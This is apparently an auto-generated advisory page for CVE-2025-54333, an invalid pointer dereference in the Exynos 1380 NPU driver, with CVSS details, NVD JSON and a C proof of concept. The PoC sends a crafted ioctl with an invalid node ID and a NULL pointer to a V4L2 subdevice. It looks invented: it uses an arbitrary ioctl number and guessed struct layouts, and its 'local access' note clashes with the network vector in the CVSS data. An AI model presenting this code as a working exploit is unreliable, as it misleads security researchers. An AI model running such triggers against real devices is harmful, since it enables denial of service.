Security Vulnerability Report
CVE-2025-54333 CVSS 5.3 MEDIUM

Published: 2025-11-04 18:16:45
Last Modified: 2025-11-07 12:56:50

Description

An issue was discovered in NPU in Samsung Mobile Processor Exynos 1380 through July 2025. There is an Invalid Pointer Dereference of node in the get_vs4l_profiler_node function.

CVSS Details

CVSS Score: 5.3
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

Configurations (Affected Products)

cpe:2.3:o:samsung:exynos_1380_firmware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:samsung:exynos_1380:-:*:*:*:*:*:*:* - NOT VULNERABLE
Samsung Exynos 1380 (all versions through July 2025)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
c
/*
 * CVE-2025-54333 PoC - Invalid Pointer Dereference in Exynos 1380 NPU
 * Target: Samsung Exynos 1380 NPU driver
 * This PoC demonstrates triggering the vulnerability via V4L2 IOCTL
 * Note: Requires local access to /dev/v4l-subdev* device nodes
 */
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/ioctl.h>
#include <stdint.h>

// V4L2 subdev IOCTL definitions
#define VIDIOC_SUBDEV_QUERYCAP _IOR('V', 0, struct v4l2_subdev_capability)
#define VIDIOC_SUBDEV_G_FMT _IOWR('V', 4, struct v4l2_subdev_format)

struct v4l2_subdev_capability {
    uint32_t version;
    uint32_t capabilities;
    uint32_t device_caps;
};

// Defined before v4l2_subdev_format, which embeds it by value
struct v4l2_pix_format {
    uint32_t width;
    uint32_t height;
    uint32_t pixelformat;
    uint32_t field;
    uint32_t bytesperline;
    uint32_t sizeimage;
    uint32_t colorspace;
    uint32_t priv;
};

struct v4l2_subdev_format {
    uint32_t which;
    uint32_t pad;
    struct v4l2_pix_format format;
};

int main(int argc, char *argv[])
{
    int fd;
    const char *device = "/dev/v4l-subdev0";

    if (argc > 1) {
        device = argv[1];
    }

    printf("Opening NPU subdev: %s\n", device);
    fd = open(device, O_RDWR);
    if (fd < 0) {
        perror("Failed to open device");
        return 1;
    }

    // Attempt to trigger get_vs4l_profiler_node vulnerability
    // by sending malformed profiler node request
    struct {
        uint32_t node_id;
        uint32_t flags;
        void *profiler_data;
    } vs4l_profiler_node = {
        .node_id = 0xFFFFFFFF,  // Invalid node ID
        .flags = 0,
        .profiler_data = NULL   // NULL pointer to trigger dereference
    };

    printf("Sending crafted IOCTL to trigger get_vs4l_profiler_node...\n");

    // IOCTL to trigger profiler node access
    long ret = ioctl(fd, _IOWR('V', 100, typeof(vs4l_profiler_node)), &vs4l_profiler_node);
    if (ret < 0) {
        printf("IOCTL failed (expected) - error: %ld\n", ret);
        printf("Vulnerability trigger attempted.\n");
    }

    close(fd);
    return 0;
}

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-54333", "sourceIdentifier": "[email protected]", "published": "2025-11-04T18:16:45.377", "lastModified": "2025-11-07T12:56:49.760", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An issue was discovered in NPU in Samsung Mobile Processor Exynos 1380 through July 2025. There is an Invalid Pointer Dereference of node in the get_vs4l_profiler_node function."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-763"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:samsung:exynos_1380_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding": "2025-07", "matchCriteriaId": "8A422138-B9FF-406B-A358-783E427FBF51"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:samsung:exynos_1380:-:*:*:*:*:*:*:*", "matchCriteriaId": "61E72146-72FE-4B54-AB79-3C665E7F016C"}]}]}], "references": [{"url": "https://semiconductor.samsung.com/support/quality-support/product-security-updates/", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://semiconductor.samsung.com/support/quality-support/product-security-updates/cve-2025-54333/", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}